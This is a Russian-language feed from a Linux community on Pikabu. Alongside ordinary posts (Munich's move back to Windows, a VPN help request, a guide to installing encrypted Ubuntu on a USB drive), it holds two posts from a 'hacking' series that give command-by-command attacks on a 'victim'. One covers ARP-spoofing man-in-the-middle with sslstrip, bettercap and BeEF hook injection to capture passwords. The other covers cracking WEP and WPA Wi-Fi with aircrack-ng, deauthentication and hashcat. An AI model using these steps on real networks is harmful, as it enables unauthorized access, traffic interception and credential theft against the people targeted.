Сообщество - GNU/Linux
Добавить пост

GNU/Linux

1 040 постов 15 540 подписчиков

Популярные теги в сообществе:

Мюнхен возвращается на проприетарное ПО

В состоявшемся сегодня голосовании по выбору стратегии дальнейшего развития IT-инфраструктуры большинство членов городского совета одобрили инициативу по созданию проекта разработки нового клиентского ПО для госучреждений, основанного на платформе Windows, которое сможет заменить собой ныне применяемую открытую платформу LiMux. Администрации поручено подготовить точный план действий, рассчитать затраты и сроки перехода, после чего состоится повторное голосование, которое одобрит или отклонит предложенный план, и решит судьбу проекта LiMux.

Источник: https://www.opennet.ru/opennews/art.shtml?num=46053

<Обучение от малого до великого> //Хакерство (Крэкерство) #5.

Предупреждение! Всё ниже описанное я не призываю исполнять и повторять, а лишь рассказываю и обучаю, чтобы вы могли знать как собран механизм взлома/обмана/и т.п.


В данной статье будем рассматривать случаи перехвата трафика в Wi-Fi сети.

MITM- человек посередине, посредник. Так называется совокупность методов перехвата трафика, где вы- посредник между роутером и жертвой. Ваш ПК будет служить в роли WiFi-точки тем самым через вас будет проходить весь накопленный трафик.


Я лично не буду рассказывать все методы и комбинации данного вида взлома, т.к. их достаточно много. Мы лично на данном примере разберём два способа. Первый сложный и изживший себя- комбинация ettercap+wireshark. Второй способ относительно новый и удобный. Bettercap- набор инструментов для проведения тестов на безопасность в сети. Так же рассмотрим случай комбинации bettercap+beef. А так же модули для bettercap'a.



I) Начнём с комбинации программ ettercap+wireshark.

root@571:~#ifconfig

root@571:~#echo "1">/proc/sys/net/ipv4/ip_forward

Далее запускаем программу ettercap.

>sniff>unified sniffing>(выбрать сетевую карту (wlan0))

>hosts>scan for hosts

>hosts>host list

>выделить роутер>add to target 1

>выбрать жертву>add to target 2

>MITM>arp poising>галочка напротив пункта "sniff remote connection"

>start>start sniffing

Далее запускаем программу wireshark.

>выбрать сетевую карту (wlan0)>start

root@571:~#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

root@571:~#sslstrip -l 8080

При этом случае в программе ettercap будет выводится вся нужная информация включая пароли жертвы.

Если вы желаете, чтобы вся информация полностью выходила в ваш браузер, можете сделать следующее:

root@571:~#webspy -i wlan0 192.168.1.7(<-вставляете IP-адрес жертвы)

И запускаем браузер.



II) Продолжим изучать методы с программой bettercap.

Bettercap- это более улучшенная версия ettercap, удобная и не хуже оригинала.

Скачать данную программу:

root@571:~#apt-get install bettercap


1)root@571:~#bettercap -X (сниффинг всей сети)

root@571:~#bettercap --proxy -P POST (активируется незащищённая сеть, сниффинг, спуфинг, в общем всё, что нам нужно)

root@571:~#bettercap --sniffer --spoof ARP --proxy-http --proxy-https --custom-parser "password"

...При данном методе будут выводится все данные, где задействованы пароли...


2)root@571:~#./beef (Далее копируем из терминала UI URL со второго абзаца в браузер)

root@571:~#bettercap -I wlan0 -T (Тут IP-жертвы) --proxy-module injectjs (Тут вставляем Hook URL со второго абзаца)

...При этом методе всё будет отображаться на вашем сервере beef открытом в браузере...



III) Так же можно рассмотреть модули для bettercap'a:

Скачать их можно таким образом:

root@571:~#git clone https://github.com/evilsocket/bettercap-proxy-modules.git


Свойства данных модулей:


1)http/androidpwn.rb – Выполнит пользовательскую команду на каждом устройстве Android, эксплуатируя уязвимость "addJavascriptInterface".


2)http/osxsparkle.rb – Выполнит пользовательский исполнимый файл Mach-O OSX на каждой OSX машине, эксплуатируя уязвимость Sparkle Updater https://vulnsec.com/2016/osx-apps-vulnerabilities/.


3)http/beefbox.rb – Похоже на inject*, но специализируется на работе с BeEF framework.


4)http/debug.rb - Отладка HTTP запросов и ответов.


5)http/simple_post.rb – Перехватывает и отображает только выбранные POST поля.


6)http/location_hijacking.rb – Перехватывает заголовок Location с пользовательским URL.


7)http/replace_images.rb – Замена всех изображений на пользовательское.


8)http/rickroll.rb – Вставка iframe с (не)знаменитым видео RickRoll в режиме автовоспроизведения.


9)http/hack_title.rb – Добавляет текст "HACKED" в заголовок веб-сайтов.


10)http/replace_file.rb – Заменяет на лету загружаемые файлы на пользовательские.


TCP прокси модули


11)tcp/debug.rb – Просто скидывает в двоичном формате весь TCP трафик, проходящий через прокси.


12)tcp/sshdowngrade.rb – Если возможно, выполняет атаку понижения SSH 2.x -> 1.x.


13)tcp/mssqlauth.rb - Понижает MSSQL шифрование и захватывает учётные данные входа.


Пример синтаксиса:

root@571:~#bettercap -X --proxy --proxy-module=/home/mial/bin/bettercap-proxy-modules/http/hack_title.rb



IV) И это ещё не все возможные комбинации и функции данной утилиты. Подробно можете почитать в самой программе набрав команду:

root@571:~#bettercap --help



Надеюсь вам понравилось. В дальнейшем буду продолжать опубликовывать статьи по дистрибутиву Kali Linux.



Связаться со мной можно в ВК: https://vk.com/hydra571.

<Обучение от малого до великого> //Хакерство (Крэкерство) #5. Kali, Linux, Wi-Fi, Хакеры, Крэкерство, Обучение, Длиннопост
<Обучение от малого до великого> //Хакерство (Крэкерство) #5. Kali, Linux, Wi-Fi, Хакеры, Крэкерство, Обучение, Длиннопост
<Обучение от малого до великого> //Хакерство (Крэкерство) #5. Kali, Linux, Wi-Fi, Хакеры, Крэкерство, Обучение, Длиннопост
<Обучение от малого до великого> //Хакерство (Крэкерство) #5. Kali, Linux, Wi-Fi, Хакеры, Крэкерство, Обучение, Длиннопост
Показать полностью 4

Прошу помощи

Решил уйти от Windows и поставил себе Xubuntu второй системой (потом, скорее всего, винду снесу). Проблема возникла практический сразу - подключение к интернету. Требуется создать VPN соединение. Пробовал через pppoeconf, но консоль пишет, что такой команды не существует.
Помогите пожалуйста!

P.S. Xubuntu 16.04

P.P.S Провайдер - Зеленая точка

<Обучение от малого до великого> //Хакерство (Крэкерство) #4.

Предупреждение! Всё ниже описанное я не призываю исполнять и повторять, а лишь рассказываю и обучаю, чтобы вы могли знать как собран механизм взлома/обмана/и т.п.


В данном уроке мы рассмотрим различные способы взлома защищённых WiFi точек при помощи дистрибутива Kali Linux.


Ниже описанные махинации не работают с Kali Linux'ом установленном на VirtualBox. Так что стоит либо сделать обычный установщик USB с Kali и от туда из режима live проворачивать данные действия (главное не забудьте скинуть все полученные файлы на основную машину, иначе они не сохранятся), либо установить на раздел жёсткого диска/целиком на жёсткий диск. Вы можете посмотреть подробную установку Kali в моих прошлых уроках.


Для справки:

()- в скобках будут уточнения.

""- в кавычках будут уточнения насчёт ввода чего-либо

... ...- отступления от темы для нужного уточнения


I) Технология защиты беспроводной сети WEP.

Совершенно не будет проблем получить доступ к данной сети. Можно сказать, что люди с WEP защитой просто дарят пароль. Соответственно такой защиты мало в настоящее время, но найти до сих пор можно. Начнём взлом.


root@571:~#iwconfig

root@571:~#airmon-ng start wlan0 (<- вводим сетевую карту в режим мониторинга)

root@571:~#iwconfig (проверяете, появилось ли новое значение)

root@571:~#airodump-ng wlan0mon (Появится таблица с нужными нам свойствами)

root@571:~#airodump-ng --bssid "Вставляем значение из столбца BSSID нужной нам (WEP) WiFi точки" --channel "Вставляем значение из столбца CH" -w /tmp/wep/ wlan0mon

... На данном моменте нужно ждать примерно 200.000 frames

Останавливаем процесс, когда frames накапали ...

root@571:~#cd /tmp/

root@571:~#ls -l (Просматриваете, есть ли файл wep-01.cap)

root@571:~#aircrack-ng wep-01.cap

... При нахождении нужного ключа появится надпись KEY FOUND!

Переписываете в блокнот последовательно все символы за исключение ":".

Должно получится что-то наподобие- 5R2IF4HG824F11YJ361743I2N8 (26 символов)

Далее подключаемся к роутеру без автоматики. У вас попросят ключ. Вставляете его и всё готово.


II) Технология защиты беспроводной сети WPA/WPA2

Данная защита ушла в лучшую сторону от старечка WEP, но всё равно остаётся уязвимой.

root@571:~#iwconfig

root@571:~#airmon-ng start wlan0 (<- вводим сетевую карту в режим мониторинга)

root@571:~#iwconfig (проверяете, появилось ли новое значение)

root@571:~#airodump-ng wlan0mon (Появится таблица с нужными нам свойствами)

root@571:~#airodump-ng --bssid "Вставляем значение из столбца BSSID нужной нам (WPA/WPA2) WiFi точки" --channel "Вставляем значение из столбца CH" -w /tmp/wep/ wlan0mon

... На данном моменте нужно ждать примерно 200.000 frames

Останавливаем процесс, когда frames накапали

И_Л_И

Если вы не хотите ждать, можете воспользоваться лёгкой альтернативой- деавторизировать пользователя в данной сети ...

root@571:~#aireplay-ng -0 1 -a "Вставляем значение из столбца BSSID нужной нам (WPA/WPA2) WiFi точки" -c "Вставляем значение из столбца STATION одного из пользователей данной сети для деавторизации" wlan0mon

root@571:~#cd /tmp/

root@571:~#ls -l (Просматриваете, есть ли файл wpa-01.cap)

root@571:~#aircrack-ng wpa-01.cap -J wpa-01.hccap

... Получаем файл wpa-01.hccap

Далее нужен уже соответственно подбирать по словарю получившиеся данные, либо брутфорсить.


1.1. Пример подбора по словарю:

hashcat -m 2500 /root/hs/wpa-01.hccap /root/rockyou.txt (rockyou.txt- это словарь часто всего встречаемых паролей, (http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2) весит он ~140Mb, в архиве ~60Mb)).

И просто соответственно ждёте пока не Kali не найдёт нужный вам пароль.


1.2. Второй вариант подбора по словарю (Windows):

Перекидываете файл на жёсткий диск Windows.

Скачиваете программу Hashcat. (https://hashcat.net/hashcat/)

Перекидываете файл .hccap и rockyou.txt в папку с .exe файлом hashcat.

Запускаете CMD от имени Администратора.

>cd Hashcat

>Hashcat64.exe -m 2500 wpa-01.hccap rockyou.txt

В итоге при успешном подборе получаем вкратце следующее:

DAP- "ненужные числа":"ненужные символы":"нужный пароль"


2. Пример работы брутфорса:

hashcat -m 2500 -a 3 capture.hccap ?d?d?d?d?d?d?d?d (Но в этом есть минус, данный брутфорс лишь выводит числа без иных символов).


Надеюсь вам понравилось. В дальнейшем буду продолжать опубликовывать статьи по дистрибутиву Kali Linux.


Связаться со мной можно в ВК: https://vk.com/hydra571.

<Обучение от малого до великого> //Хакерство (Крэкерство) #4. Kali, Linux, Хакеры, Крэкерство, Обучение, Wi-Fi, Длиннопост
Показать полностью 1

Сколько нужно владок с пикабу в хроме, чтоб заполнить 50 гб ОЗУ?

1697

В какой-то момент вкладки перестают прорисовываться и окно выглядит вот так:

Сколько нужно владок с пикабу в хроме, чтоб заполнить 50 гб ОЗУ? Интересное, Linux, Извращенцы, Google Chrome

А это "диспетчер задач", первые 4 полоски - загрузка процессора, следующая память в мегабайтах, а за ней swap.

Сколько нужно владок с пикабу в хроме, чтоб заполнить 50 гб ОЗУ? Интересное, Linux, Извращенцы, Google Chrome

На этом моменте хром упал :(

Показать полностью 2

Установка Ubuntu на съемный носитель

Всем доброго времени суток. На волне поста http://pikabu.ru/story/praktika_informatsionnoy_bezopasnosti..., решил рассказать о своей версии аварийного загрузочного жесткого диска. В первом посте мы установим дистрибутив на жесткий диск, чтоб потом с него модно было загружаться. В последующих разберем мультизагрузку для установки разнообразных виндов и линуксов, а так же развертывание PXE сервера для загрузки компьютеров по сети. HOWTO будет очень подробным, буквально шаг за шагом.


Для начала нам потребуется установленнаая ОС и VirtualBox в ней. Лично я использовал Ubuntu 16.04, на ее примере все и продемонстрирую.


Добавим репозиторий со свежей версиенй VB, обновим систему и установим ВМ.


>$ sudo echo "deb http://download.virtualbox.org/virtualbox/debian $(lsb_release -sc) contrib" >> /etc/apt/sources.list

>$ wget -q https://www.virtualbox.org/download/oracle_vbox.asc -O- | sudo apt-key add -

>$ sudo apt update && sudo apt dist-upgrade -y

>$ sudo apt install virtualbox


Качаем и скармливаем ВБоксу Extension Pack. Очень важно, чтоб их версии совпадали. Кончно можно поставить и из репозитория, но как то раз лично столкнулся с проблемой совместимости версий.


Далее, чтоб использовать перенаправление устройств, добавим своего пользователя в нужную группу.


>$ sudo usermod -aG vboxusers <имя_вашего_пользователя>


Перезагрузим систему, чтоб все изменения вступили в силу и проверим, что все у нас на месте и работает.


Все вышеописанное можно сделать и в винде, скачав установщик виртуалбокса и пакет расширений к нему.

Установка Ubuntu на съемный носитель Linux, Ubuntu, Администрирование, Гайд, Howto, Длиннопост

Создадим новую виртуальную машину. Но подключать виртуальный жесткий диск в нее не будем.

Установка Ubuntu на съемный носитель Linux, Ubuntu, Администрирование, Гайд, Howto, Длиннопост

В настройках ВМ, укажем, какое USB устройство необходимо пробросить. Так как мой мобильный хард уже занят установленной и настроенной системой, для данного поста я использую флешку на 16 ГБ. С жестким диском все делается аналогично, но, судя по опыту, он работает гораздо быстрее (точнее флешка очень медленно, а может, просто её возраст уже сказывается), свободного места остается больше, да и разделы можно разметить посвободнее.

Установка Ubuntu на съемный носитель Linux, Ubuntu, Администрирование, Гайд, Howto, Длиннопост

Подключим ISO образ операционки. Я обычно использую Ubuntu Server, а затем уже сам прикручиваю к нему Среду рабочего стола. Так устанавливается меньше лишнего софта. Поставить все необходимое мы всегда успеем.

Установка Ubuntu на съемный носитель Linux, Ubuntu, Администрирование, Гайд, Howto, Длиннопост

Вот и все, подготовка окончена, приступаем непосредственно к самой установке. Все описанное ниже будет происходить в виртуальной машине.


С первичными настройками проблем возникнуть не должно. Выбираем русский язык -> установить Ubuntu Server -> Свой регион -> Раскладка клавиатуры (на данном этапе жмем НЕТ и выбираем в ручную) -> Сочетание клавиш для переключения. Ждем немного. Затем задаем имя нашего компьютера, полное имя пользователя, потом логин и пароль. На предложение зашифровать домашний каталог отвечаем ОТРИЦАТЕЛЬНО. Наконец, соглашаемся (или выбираем) часовой пояс.


Приступаем к разметке нашего диска. Выбираем способ разметки ВРУЧНУЮ, ЭТО ВАЖНО!

Установка Ubuntu на съемный носитель Linux, Ubuntu, Администрирование, Гайд, Howto, Длиннопост

Выбираем наш диск, нажимаем Enter и соглашаемся с созданием новой таблицы разделов. ВНИМАНИЕ! Все данные на носителе будут уничтожены.

Установка Ubuntu на съемный носитель Linux, Ubuntu, Администрирование, Гайд, Howto, Длиннопост

Далее выбираем свободное место - создать новый раздел. Размер указываем 256М. Тип раздела первичный, расположение - конец.

В настройках раздела "Использовать как" выбираем ext2, точка монтирования /boot, метка boot, метка загрузочный вкл. И завершаем настройку раздела.


Почему начинаем разметку с конца: конкретно на флешках вин7 (насчет других утверждать не буду) видит только первый по счету раздел. Его мы разметим в последнюю очередь на все оставшееся место, чтоб можно было использовать носитель и для обычного файлообмена. В случае с жестким диском, порядок разделов не важен.

Установка Ubuntu на съемный носитель Linux, Ubuntu, Администрирование, Гайд, Howto, Длиннопост

Снова выбираем свободное место. Здесь у нас будет располагаться шифрованный раздел для корня ФС, домашних директорий пользователей и раздела подкачки. Потому посчитаем, сколько всего нам надо места: 2 гигабайта под свап, 6 под корень и 4 под хомяки. Итого 12 гигабайт. В случае с жестким диском можно увеличить данные разделы, например, 10-20 под корень и 20-40 под домашние каталоги.


Создаем новый раздел. Размер 12G, тип первичный, расположение - конец.

В настройках "Использовать как" выбираем физический том для шифрования. В остальных настройках ничего не меняем. Единственное, уменьшение длины ключа чуть ослабляет шифрование, но при этом ускоряет работу. С этим параметром можно поиграться.

Установка Ubuntu на съемный носитель Linux, Ubuntu, Администрирование, Гайд, Howto, Длиннопост

Выбираем оставшееся свободное место. Аналогичным образом создаем раздел, размер - весь оставшийся (он будет указан по умолчанию), тип - первичный, расположение - не важно. Использовать как - FAT32. Точка монтирования - кому как нравится. Я его примонтирую в /usbdata. Для этого при выборе надо указать точку монтирования вручную. Как обычно завершаем настройку раздела.


В итоге имеем примерно следующую структуру:

Установка Ubuntu на съемный носитель Linux, Ubuntu, Администрирование, Гайд, Howto, Длиннопост

Активируем наш шифрованный раздел. Для этого выберем пункт "Настроить шифрование томов", затем согласимся с записью разметки на диск. В диалоге выбираем "Create encrypted volumes":

Установка Ubuntu на съемный носитель Linux, Ubuntu, Администрирование, Гайд, Howto, Длиннопост

Пробелом отмечаем наш том для шифрования:

Установка Ubuntu на съемный носитель Linux, Ubuntu, Администрирование, Гайд, Howto, Длиннопост

Жмем "Продолжить", затем в появившемся окне "Finish". Появляется диалог ввода пароля для шифрованного тома. Дважды вводим -> Продолжить, и попадаем обратно в диалог разметки. Там нам нужно выбрать получившийся раздел в шифрованном контейнере. И в его свойствах "Использовать как" выбрать пункт "Физический том для LVM". И, как обычно, завершаем настройку раздела.

Установка Ubuntu на съемный носитель Linux, Ubuntu, Администрирование, Гайд, Howto, Длиннопост

После всех манипуляций мы сново попадаем в диалог разметки. Теперь нас интересует пункт "Настройка менеджера логических томов (LVM)". После его выбора соглашаемся с записью изменений на диск.

В настройках LVM выбираем пункт "Создать группу томов". Придумываем имя, я назвал lili-vg. В качестве устройства пробелом выбираем /dev/mapper/sda2_crypt. И как обычно жмем продолжить.

Установка Ubuntu на съемный носитель Linux, Ubuntu, Администрирование, Гайд, Howto, Длиннопост

Теперь у нас меню чуть поболее. В нем мы выбираем пункт "Создать логический том".

Установка Ubuntu на съемный носитель Linux, Ubuntu, Администрирование, Гайд, Howto, Длиннопост

ыбираем в какой группе томов он будет создан (она у нас одна), придумываем название (Я предпочитаю называть по целевому назначению томов. Начнем с root), и укажем планируемый под него размер. В моем примере это 6G.


Точно таким же образом создаем логические тома под swap (у меня 2G) и home все остальное.

Когда мы создали 3 логических тома, заканчиваем настройку LVM. И снова попадаем в диалог разметки.Теперь нужно указать системе, каким образом использовать каждый логический раздел.


Выбираем свободное место одного из разделов, смотрим его назначение.

Установка Ubuntu на съемный носитель Linux, Ubuntu, Администрирование, Гайд, Howto, Длиннопост

На данном скрине мы выбрали настройку home. Использовать как ext4, точка монтирования /home, метка home, закончить настройку.


Таким же образом размечаем root. Использовать как ext4, монтировать в /, метка root, закончить настройку.


Последний раздел swap. Использовать как раздел подкачки.


Теперь выбираем "Закончить разметку и записать изменения на диск."

Установка Ubuntu на съемный носитель Linux, Ubuntu, Администрирование, Гайд, Howto, Длиннопост

Все! Выдохнули! Разметка диска закончена. Начинается непосредственно установка ОС. В зависимости от типа и скорости накопителя, она может занять достаточно большое количество времени. Так же, в процессе установки будет задан вопрос насчет наличия прокси. Если есть - указываем, если нет - оставляем пустым. Ответ на вопрос об обновлениях - на ваш выбор. Я предпочитаю автоматическую установку пакетов, касающихся безопасности.


Следующим появится меню выбора ПО. Здесь мы можем все оставить по умолчанию. Все программы установим позже.

Установка Ubuntu на съемный носитель Linux, Ubuntu, Администрирование, Гайд, Howto, Длиннопост

Все, дальше система доустановится сама. На вопрос, установить ли GRUB в MBR отвечаем положительно.


Система установлена, пробуем загрузиться со своего носителя. В процессе система попросит у нас ключ для шифрованного контейнера.


После полной загрузки логинимся под учетной записью, которую заводили во время установки, прописываем сетевую карту в /etc/network/interfaces , перезапускаем сетевой сервис


>$ sudo systemctl restart networking.service


обновляемся


>$ sudo apt update && sudo apt dist-upgrade -y


и ставим окружение рабочего стола. Для мобильных дистрибутивов я обычно использую XFCE.


>$ sudo apt install xfce4


Вот и все. Дальше уже можно настраивать рабочий стол под себя, устанавливать необходимое ПО, браузеры например, клиенты удаленного рабочего стола, дисковые и сетевые утилиты и тд.


Если у кого есть замечания или предложения, очень прошу поделиться.

Показать полностью 17

Премущества Linux

#comment_81195221

Премущества Linux Комментарии, Linux, Пикабу, Windows, Текст
Показать полностью 1

Готовы к Евро-2024? А ну-ка, проверим!

Для всех поклонников футбола Hisense подготовил крутой конкурс в соцсетях. Попытайте удачу, чтобы получить классный мерч и технику от глобального партнера чемпионата.

А если не любите полагаться на случай и сразу отправляетесь за техникой Hisense, не прячьте далеко чек. Загрузите на сайт и получите подписку на Wink на 3 месяца в подарок.

Готовы к Евро-2024? А ну-ка, проверим! Футбол, Тест, Евро 2024, Болельщики, ВКонтакте (ссылка)

Реклама ООО «Горенье БТ», ИНН: 7704722037

Книга(и) по Linux

Всем привет!

Посоветуйте что почитать по администрированию Linux.

Отличная работа, все прочитано!